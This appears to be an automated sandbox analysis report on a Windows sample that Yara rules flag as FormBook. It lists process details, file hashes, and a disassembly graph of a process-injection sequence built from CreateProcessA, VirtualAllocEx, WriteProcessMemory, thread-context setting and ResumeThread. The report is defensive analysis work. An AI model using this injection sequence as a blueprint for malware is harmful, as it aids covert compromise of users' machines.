68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:1
                                                                            Start time:02:21:10
                                                                            Start date:24/11/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0x240000
                                                                            File size:1'026'560 bytes
                                                                            MD5 hash:DF31A2CCD06E0F1075F7280D156F5237
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:02:21:11
                                                                            Start date:24/11/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0xc80000
                                                                            File size:1'026'560 bytes
                                                                            MD5 hash:DF31A2CCD06E0F1075F7280D156F5237
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:02:21:25
                                                                            Start date:24/11/2024
                                                                            Path:C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe"
                                                                            Imagebase:0xc40000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:7
                                                                            Start time:02:21:27
                                                                            Start date:24/11/2024
                                                                            Path:C:\Windows\SysWOW64\regini.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                            Imagebase:0x1a0000
                                                                            File size:41'472 bytes
                                                                            MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:8
                                                                            Start time:02:21:39
                                                                            Start date:24/11/2024
                                                                            Path:C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe"
                                                                            Imagebase:0xc40000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:10
                                                                            Start time:02:21:52
                                                                            Start date:24/11/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff613480000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:9.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:207
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 23011 6ba79b8 23012 6ba7a03 ReadProcessMemory 23011->23012 23014 6ba7a47 23012->23014 23015 6bab2d8 23016 6bab2f6 23015->23016 23017 6bab300 23015->23017 23020 6bab32b 23016->23020 23025 6bab340 23016->23025 23021 6bab34e 23020->23021 23022 6bab36d 23020->23022 23030 6baa8b8 23021->23030 23022->23017 23026 6bab34e 23025->23026 23029 6bab36d 23025->23029 23027 6baa8b8 CloseHandle 23026->23027 23028 6bab369 23027->23028 23028->23017 23029->23017 23031 6bab4b8 CloseHandle 23030->23031 23032 6bab369 23031->23032 23032->23017 23033 266cfa0 23034 266cfe6 23033->23034 23038 266d578 23034->23038 23042 266d588 23034->23042 23035 266d0d3 23039 266d588 23038->23039 23045 266d1dc 23039->23045 23043 266d1dc DuplicateHandle 23042->23043 23044 266d5b6 23043->23044 23044->23035 23046 266d5f0 DuplicateHandle 23045->23046 23047 266d5b6 23046->23047 23047->23035 23068 266ac10 23069 266ac1f 23068->23069 23072 266ad08 23068->23072 23077 266acf9 23068->23077 23073 266ad3c 23072->23073 23075 266ad19 23072->23075 23073->23069 23074 266af40 GetModuleHandleW 23076 266af6d 23074->23076 23075->23073 23075->23074 23076->23069 23078 266ad3c 23077->23078 23079 266ad19 23077->23079 23078->23069 23079->23078 23080 266af40 GetModuleHandleW 23079->23080 23081 266af6d 23080->23081 23081->23069 23082 6ba82cd 23083 6ba7f6c 23082->23083 23083->23082 23084 6ba809b 23083->23084 23088 6ba88c8 23083->23088 23093 6ba892e 23083->23093 23099 6ba88b9 23083->23099 23089 6ba88e2 23088->23089 23104 6ba8c10 23089->23104 23123 6ba8c00 23089->23123 23090 6ba88ea 23090->23083 23094 6ba88bc 23093->23094 23096 6ba8931 23093->23096 23097 6ba8c10 10 API calls 23094->23097 23098 6ba8c00 10 API calls 23094->23098 23095 6ba88ea 23095->23083 23096->23083 23097->23095 23098->23095 23100 6ba88bc 23099->23100 23102 6ba8c10 10 API calls 23100->23102 23103 6ba8c00 10 API calls 23100->23103 23101 6ba88ea 23101->23083 23102->23101 23103->23101 23105 6ba8c25 23104->23105 23142 6ba8fdb 23105->23142 23146 6ba9246 23105->23146 23150 6ba8d23 23105->23150 23155 6ba8e62 23105->23155 23160 6ba962b 23105->23160 23165 6ba948b 23105->23165 23170 6ba8f2a 23105->23170 23175 6ba95b7 23105->23175 23180 6ba8fb7 23105->23180 23185 6ba8d51 23105->23185 23190 6ba9450 23105->23190 23195 6ba8ed2 23105->23195 23200 6ba8ddd 23105->23200 23205 6ba915e 23105->23205 23210 6ba9538 23105->23210 23215 6ba8ef8 23105->23215 23106 6ba8c37 23106->23090 23124 6ba8c25 23123->23124 23126 6ba8fdb 2 API calls 23124->23126 23127 6ba8ef8 2 API calls 23124->23127 23128 6ba9538 2 API calls 23124->23128 23129 6ba915e 2 API calls 23124->23129 23130 6ba8ddd 2 API calls 23124->23130 23131 6ba8ed2 2 API calls 23124->23131 23132 6ba9450 2 API calls 23124->23132 23133 6ba8d51 2 API calls 23124->23133 23134 6ba8fb7 2 API calls 23124->23134 23135 6ba95b7 2 API calls 23124->23135 23136 6ba8f2a 2 API calls 23124->23136 23137 6ba948b 2 API calls 23124->23137 23138 6ba962b 2 API calls 23124->23138 23139 6ba8e62 2 API calls 23124->23139 23140 6ba8d23 2 API calls 23124->23140 23141 6ba9246 2 API calls 23124->23141 23125 6ba8c37 23125->23090 23126->23125 23127->23125 23128->23125 23129->23125 23130->23125 23131->23125 23132->23125 23133->23125 23134->23125 23135->23125 23136->23125 23137->23125 23138->23125 23139->23125 23140->23125 23141->23125 23220 6ba78c8 23142->23220 23224 6ba78c0 23142->23224 23143 6ba9002 23143->23106 23228 6ba72f8 23146->23228 23232 6ba72f0 23146->23232 23147 6ba9260 23151 6ba8d56 23150->23151 23152 6ba8e96 23151->23152 23236 6ba7b50 23151->23236 23240 6ba7b44 23151->23240 23152->23152 23156 6ba8e68 23155->23156 23158 6ba7b50 CreateProcessA 23156->23158 23159 6ba7b44 CreateProcessA 23156->23159 23157 6ba8e96 23157->23157 23158->23157 23159->23157 23161 6ba954e 23160->23161 23244 6ba6e08 23161->23244 23248 6ba6e10 23161->23248 23162 6ba9744 23166 6ba94ae 23165->23166 23168 6ba78c8 WriteProcessMemory 23166->23168 23169 6ba78c0 WriteProcessMemory 23166->23169 23167 6ba96bc 23168->23167 23169->23167 23171 6ba8f4b 23170->23171 23173 6ba78c8 WriteProcessMemory 23171->23173 23174 6ba78c0 WriteProcessMemory 23171->23174 23172 6ba8f6c 23172->23106 23173->23172 23174->23172 23176 6ba954e 23175->23176 23178 6ba6e08 ResumeThread 23176->23178 23179 6ba6e10 ResumeThread 23176->23179 23177 6ba9744 23178->23177 23179->23177 23181 6ba8f0f 23180->23181 23183 6ba6e08 ResumeThread 23181->23183 23184 6ba6e10 ResumeThread 23181->23184 23182 6ba9744 23183->23182 23184->23182 23186 6ba8d31 23185->23186 23187 6ba8e24 23186->23187 23188 6ba7b50 CreateProcessA 23186->23188 23189 6ba7b44 CreateProcessA 23186->23189 23187->23106 23187->23187 23188->23187 23189->23187 23191 6ba97a5 23190->23191 23252 6ba7808 23191->23252 23256 6ba7800 23191->23256 23192 6ba97c3 23196 6ba8edf 23195->23196 23198 6ba78c8 WriteProcessMemory 23196->23198 23199 6ba78c0 WriteProcessMemory 23196->23199 23197 6ba8f6c 23197->23106 23198->23197 23199->23197 23201 6ba8d31 23200->23201 23202 6ba8e24 23201->23202 23203 6ba7b50 CreateProcessA 23201->23203 23204 6ba7b44 CreateProcessA 23201->23204 23202->23106 23202->23202 23203->23202 23204->23202 23206 6ba957e 23205->23206 23260 6ba9988 23206->23260 23265 6ba9978 23206->23265 23207 6ba9597 23211 6ba954d 23210->23211 23213 6ba6e08 ResumeThread 23211->23213 23214 6ba6e10 ResumeThread 23211->23214 23212 6ba9744 23213->23212 23214->23212 23216 6ba8efe 23215->23216 23218 6ba6e08 ResumeThread 23216->23218 23219 6ba6e10 ResumeThread 23216->23219 23217 6ba9744 23218->23217 23219->23217 23221 6ba7910 WriteProcessMemory 23220->23221 23223 6ba7967 23221->23223 23223->23143 23225 6ba7910 WriteProcessMemory 23224->23225 23227 6ba7967 23225->23227 23227->23143 23229 6ba733d Wow64SetThreadContext 23228->23229 23231 6ba7385 23229->23231 23231->23147 23233 6ba733d Wow64SetThreadContext 23232->23233 23235 6ba7385 23233->23235 23235->23147 23237 6ba7bd9 23236->23237 23237->23237 23238 6ba7d3e CreateProcessA 23237->23238 23239 6ba7d9b 23238->23239 23241 6ba7bd9 23240->23241 23241->23241 23242 6ba7d3e CreateProcessA 23241->23242 23243 6ba7d9b 23242->23243 23243->23243 23245 6ba6e14 ResumeThread 23244->23245 23247 6ba6e81 23245->23247 23247->23162 23249 6ba6e14 ResumeThread 23248->23249 23251 6ba6e81 23249->23251 23251->23162 23253 6ba7848 VirtualAllocEx 23252->23253 23255 6ba7885 23253->23255 23255->23192 23257 6ba7848 VirtualAllocEx 23256->23257 23259 6ba7885 23257->23259 23259->23192 23261 6ba999d 23260->23261 23263 6ba72f8 Wow64SetThreadContext 23261->23263 23264 6ba72f0 Wow64SetThreadContext 23261->23264 23262 6ba99b3 23262->23207 23263->23262 23264->23262 23266 6ba998c 23265->23266 23268 6ba72f8 Wow64SetThreadContext 23266->23268 23269 6ba72f0 Wow64SetThreadContext 23266->23269 23267 6ba99b3 23267->23207 23268->23267 23269->23267 23270 6ba9b00 23271 6ba9c8b 23270->23271 23273 6ba9b26 23270->23273 23273->23271 23274 6ba4370 23273->23274 23275 6ba9d80 PostMessageW 23274->23275 23276 6ba9dec 23275->23276 23276->23273 23048 2664668 23049 2664672 23048->23049 23051 2664758 23048->23051 23052 266477d 23051->23052 23056 2664868 23052->23056 23060 2664858 23052->23060 23058 266488f 23056->23058 23057 266496c 23058->23057 23064 26644b4 23058->23064 23062 2664868 23060->23062 23061 266496c 23061->23061 23062->23061 23063 26644b4 CreateActCtxA 23062->23063 23063->23061 23065 26658f8 CreateActCtxA 23064->23065 23067 26659bb 23065->23067

                                                                              Executed Functions

                                                                              Function 06BAA9E8 Relevance: .6, Instructions: 629COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 97e68e0bb66d8379f5f0383557d010c69c851ea18a414e1354d647e00c8662a3
                                                                              • Instruction ID: af97e6ed438c2c8a405cbe6727e3fd5898266b1a4eac99e6e334052f0f1ba582
                                                                              • Opcode Fuzzy Hash: 97e68e0bb66d8379f5f0383557d010c69c851ea18a414e1354d647e00c8662a3
                                                                              • Instruction Fuzzy Hash: 713299B0B053049FDB59DB65C550BAEBBF6AF89300F2444A9E546EB3A0DB35ED01CB60
                                                                              Function 06BA7B44 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 6ba7b44-6ba7be5 2 6ba7c1e-6ba7c3e 0->2 3 6ba7be7-6ba7bf1 0->3 10 6ba7c40-6ba7c4a 2->10 11 6ba7c77-6ba7ca6 2->11 3->2 4 6ba7bf3-6ba7bf5 3->4 5 6ba7c18-6ba7c1b 4->5 6 6ba7bf7-6ba7c01 4->6 5->2 8 6ba7c03 6->8 9 6ba7c05-6ba7c14 6->9 8->9 9->9 12 6ba7c16 9->12 10->11 13 6ba7c4c-6ba7c4e 10->13 19 6ba7ca8-6ba7cb2 11->19 20 6ba7cdf-6ba7d99 CreateProcessA 11->20 12->5 14 6ba7c50-6ba7c5a 13->14 15 6ba7c71-6ba7c74 13->15 17 6ba7c5e-6ba7c6d 14->17 18 6ba7c5c 14->18 15->11 17->17 21 6ba7c6f 17->21 18->17 19->20 22 6ba7cb4-6ba7cb6 19->22 31 6ba7d9b-6ba7da1 20->31 32 6ba7da2-6ba7e28 20->32 21->15 24 6ba7cb8-6ba7cc2 22->24 25 6ba7cd9-6ba7cdc 22->25 26 6ba7cc6-6ba7cd5 24->26 27 6ba7cc4 24->27 25->20 26->26 29 6ba7cd7 26->29 27->26 29->25 31->32 42 6ba7e2a-6ba7e2e 32->42 43 6ba7e38-6ba7e3c 32->43 42->43 44 6ba7e30 42->44 45 6ba7e3e-6ba7e42 43->45 46 6ba7e4c-6ba7e50 43->46 44->43 45->46 47 6ba7e44 45->47 48 6ba7e52-6ba7e56 46->48 49 6ba7e60-6ba7e64 46->49 47->46 48->49 50 6ba7e58 48->50 51 6ba7e76-6ba7e7d 49->51 52 6ba7e66-6ba7e6c 49->52 50->49 53 6ba7e7f-6ba7e8e 51->53 54 6ba7e94 51->54 52->51 53->54 56 6ba7e95 54->56 56->56
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BA7D86
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: c1d30cc012690582cdf280a4e080121f70e2f35fde61fcec4719313e5395f2ae
                                                                              • Instruction ID: e8a0c2df33b8ae82bae9e78614fef3860e9d7d2d5a3db79c5967ad69ae49884f
                                                                              • Opcode Fuzzy Hash: c1d30cc012690582cdf280a4e080121f70e2f35fde61fcec4719313e5395f2ae
                                                                              • Instruction Fuzzy Hash: CBA18DB5D083199FEB60CF69C840BEEBBB2FF48310F1485A9D808A7240DB759985CF91
                                                                              Function 06BA7B50 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 57 6ba7b50-6ba7be5 59 6ba7c1e-6ba7c3e 57->59 60 6ba7be7-6ba7bf1 57->60 67 6ba7c40-6ba7c4a 59->67 68 6ba7c77-6ba7ca6 59->68 60->59 61 6ba7bf3-6ba7bf5 60->61 62 6ba7c18-6ba7c1b 61->62 63 6ba7bf7-6ba7c01 61->63 62->59 65 6ba7c03 63->65 66 6ba7c05-6ba7c14 63->66 65->66 66->66 69 6ba7c16 66->69 67->68 70 6ba7c4c-6ba7c4e 67->70 76 6ba7ca8-6ba7cb2 68->76 77 6ba7cdf-6ba7d99 CreateProcessA 68->77 69->62 71 6ba7c50-6ba7c5a 70->71 72 6ba7c71-6ba7c74 70->72 74 6ba7c5e-6ba7c6d 71->74 75 6ba7c5c 71->75 72->68 74->74 78 6ba7c6f 74->78 75->74 76->77 79 6ba7cb4-6ba7cb6 76->79 88 6ba7d9b-6ba7da1 77->88 89 6ba7da2-6ba7e28 77->89 78->72 81 6ba7cb8-6ba7cc2 79->81 82 6ba7cd9-6ba7cdc 79->82 83 6ba7cc6-6ba7cd5 81->83 84 6ba7cc4 81->84 82->77 83->83 86 6ba7cd7 83->86 84->83 86->82 88->89 99 6ba7e2a-6ba7e2e 89->99 100 6ba7e38-6ba7e3c 89->100 99->100 101 6ba7e30 99->101 102 6ba7e3e-6ba7e42 100->102 103 6ba7e4c-6ba7e50 100->103 101->100 102->103 104 6ba7e44 102->104 105 6ba7e52-6ba7e56 103->105 106 6ba7e60-6ba7e64 103->106 104->103 105->106 107 6ba7e58 105->107 108 6ba7e76-6ba7e7d 106->108 109 6ba7e66-6ba7e6c 106->109 107->106 110 6ba7e7f-6ba7e8e 108->110 111 6ba7e94 108->111 109->108 110->111 113 6ba7e95 111->113 113->113
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BA7D86
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 590eef312ecd18b2460300f82a5f29cda402ad173694e148167e12bdbd235bd5
                                                                              • Instruction ID: b1dba43fcea60c2339af94eccf9f3bd56b5112227499c074da33ebef1ed1a2a8
                                                                              • Opcode Fuzzy Hash: 590eef312ecd18b2460300f82a5f29cda402ad173694e148167e12bdbd235bd5
                                                                              • Instruction Fuzzy Hash: AD916DB5D083198FEB64CF69C840BEDBBB2FF48310F1485A9D848A7240DB759985CF91
                                                                              Function 0266AD08 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 114 266ad08-266ad17 115 266ad43-266ad47 114->115 116 266ad19-266ad26 call 266a02c 114->116 118 266ad5b-266ad9c 115->118 119 266ad49-266ad53 115->119 122 266ad3c 116->122 123 266ad28 116->123 125 266ad9e-266ada6 118->125 126 266ada9-266adb7 118->126 119->118 122->115 171 266ad2e call 266afa0 123->171 172 266ad2e call 266af90 123->172 125->126 127 266addb-266addd 126->127 128 266adb9-266adbe 126->128 130 266ade0-266ade7 127->130 131 266adc0-266adc7 call 266a038 128->131 132 266adc9 128->132 129 266ad34-266ad36 129->122 133 266ae78-266af38 129->133 136 266adf4-266adfb 130->136 137 266ade9-266adf1 130->137 134 266adcb-266add9 131->134 132->134 164 266af40-266af6b GetModuleHandleW 133->164 165 266af3a-266af3d 133->165 134->130 140 266adfd-266ae05 136->140 141 266ae08-266ae11 call 266a048 136->141 137->136 140->141 145 266ae13-266ae1b 141->145 146 266ae1e-266ae23 141->146 145->146 147 266ae25-266ae2c 146->147 148 266ae41-266ae45 146->148 147->148 150 266ae2e-266ae3e call 266a058 call 266a068 147->150 169 266ae48 call 266b2a0 148->169 170 266ae48 call 266b290 148->170 150->148 152 266ae4b-266ae4e 155 266ae50-266ae6e 152->155 156 266ae71-266ae77 152->156 155->156 166 266af74-266af88 164->166 167 266af6d-266af73 164->167 165->164 167->166 169->152 170->152 171->129 172->129
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0266AF5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 8b3fff5984dd59757a458729fc6d1de4b3a713fe01809f60f682875e3e1cdce6
                                                                              • Instruction ID: f79209d64cf7e3676454d7a09b17cc6a4a22e0b125a538607cbc1070b4d1072c
                                                                              • Opcode Fuzzy Hash: 8b3fff5984dd59757a458729fc6d1de4b3a713fe01809f60f682875e3e1cdce6
                                                                              • Instruction Fuzzy Hash: 79712570A00B458FDB24DFA9D04476ABBF5FF88204F00892DD49AE7B90DB75E949CB91
                                                                              Function 026658EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 173 26658ec-26658f6 174 26658f8-26659b9 CreateActCtxA 173->174 176 26659c2-2665a1c 174->176 177 26659bb-26659c1 174->177 184 2665a1e-2665a21 176->184 185 2665a2b-2665a2f 176->185 177->176 184->185 186 2665a40-2665a70 185->186 187 2665a31-2665a3d 185->187 191 2665a22-2665a27 186->191 192 2665a72-2665af4 186->192 187->186 191->185
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 026659A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 941f3e79a82e1d81165bfe44772583e31f66843bac07cadfa0f431df635d2a46
                                                                              • Instruction ID: 9c5a912f19570a417d9c7250a38bdefe21de3231a39748d11ba592d47e37c385
                                                                              • Opcode Fuzzy Hash: 941f3e79a82e1d81165bfe44772583e31f66843bac07cadfa0f431df635d2a46
                                                                              • Instruction Fuzzy Hash: 7E41E570C00719CFEB24DFA9C884BDDBBB5BF49304F64815AD409AB251DB75694ACF90
                                                                              Function 026644B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 195 26644b4-26659b9 CreateActCtxA 198 26659c2-2665a1c 195->198 199 26659bb-26659c1 195->199 206 2665a1e-2665a21 198->206 207 2665a2b-2665a2f 198->207 199->198 206->207 208 2665a40-2665a70 207->208 209 2665a31-2665a3d 207->209 213 2665a22-2665a27 208->213 214 2665a72-2665af4 208->214 209->208 213->207
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 026659A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 553fdbb344ac8abbf07706f9b2e9cce2d31ec48252384cf496fc185ae0890988
                                                                              • Instruction ID: 2feff7e115da71106c28d86b39aefef07e3c5b41d3d2ebe469a76625d335de11
                                                                              • Opcode Fuzzy Hash: 553fdbb344ac8abbf07706f9b2e9cce2d31ec48252384cf496fc185ae0890988
                                                                              • Instruction Fuzzy Hash: 4C41D171C00719CBEB24DFA9C848BDEBBB5FF48304F60816AD409AB251DBB56949CF90
                                                                              Function 06BA78C0 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 217 6ba78c0-6ba7916 219 6ba7918-6ba7924 217->219 220 6ba7926-6ba7965 WriteProcessMemory 217->220 219->220 222 6ba796e-6ba799e 220->222 223 6ba7967-6ba796d 220->223 223->222
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BA7958
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 146a78cbd995868871f6f6bd77082706cad3a75235ec3b4e033175334bb08c03
                                                                              • Instruction ID: e70a026c35dc106381c90d2e8d6ffb8471d2bcbcbf5165758a2b17ab45c831fa
                                                                              • Opcode Fuzzy Hash: 146a78cbd995868871f6f6bd77082706cad3a75235ec3b4e033175334bb08c03
                                                                              • Instruction Fuzzy Hash: E8216BB6D043099FDB10CFA9C980BDEBBF1FF48310F10842AE959A7241D7789955CBA4
                                                                              Function 06BA78C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 227 6ba78c8-6ba7916 229 6ba7918-6ba7924 227->229 230 6ba7926-6ba7965 WriteProcessMemory 227->230 229->230 232 6ba796e-6ba799e 230->232 233 6ba7967-6ba796d 230->233 233->232
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BA7958
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: f255fde9fdab73459ffe30da378d2fd981bc37815966588e17e08ea715be65f0
                                                                              • Instruction ID: b576b5a5b794f9439b1b8c47099d7c9668a9e7f14e81a01bd1d8e66a4775a4ab
                                                                              • Opcode Fuzzy Hash: f255fde9fdab73459ffe30da378d2fd981bc37815966588e17e08ea715be65f0
                                                                              • Instruction Fuzzy Hash: 502169B5D043099FDB10CFAAC980BDEBBF5FF48310F10842AE918A7241C7789944CBA4
                                                                              Function 0266D1DC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 237 266d1dc-266d684 DuplicateHandle 239 266d686-266d68c 237->239 240 266d68d-266d6aa 237->240 239->240
